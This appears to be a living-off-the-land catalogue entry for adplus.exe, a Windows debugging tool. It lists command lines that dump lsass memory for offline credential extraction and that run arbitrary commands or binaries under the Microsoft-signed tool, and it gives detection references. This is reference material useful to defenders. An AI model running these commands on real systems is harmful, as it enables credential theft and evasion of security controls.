adplus.exe

Debugging tool included with Windows Debugging Tools

Paths

• C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
• C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe

Commands

Dump

Creates a memory dump of the lsass process

Use case: Create memory dump and parse it offline

Privileges: SYSTEM

adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet

Execute

Execute arbitrary commands using adplus config file (see Resources section for a sample file).

Use case: Run commands under a trusted Microsoft signed binary

Privileges: User

adplus.exe -c {PATH:.xml}

Dump

Dump process memory using adplus config file (see Resources section for a sample file).

Use case: Run commands under a trusted Microsoft signed binary

Privileges: SYSTEM

adplus.exe -c {PATH:.xml}

Execute

Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.

Use case: Run commands under a trusted Microsoft signed binary

Privileges: User

adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe}

Detection

• Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
• IOC: As a Windows SDK binary, execution on a system may be suspicious

Resources

• https://mrd0x.com/adplus-debugging-tool-lsass-dump/
• https://twitter.com/nas_bench/status/1534916659676422152
• https://twitter.com/nas_bench/status/1534915321856917506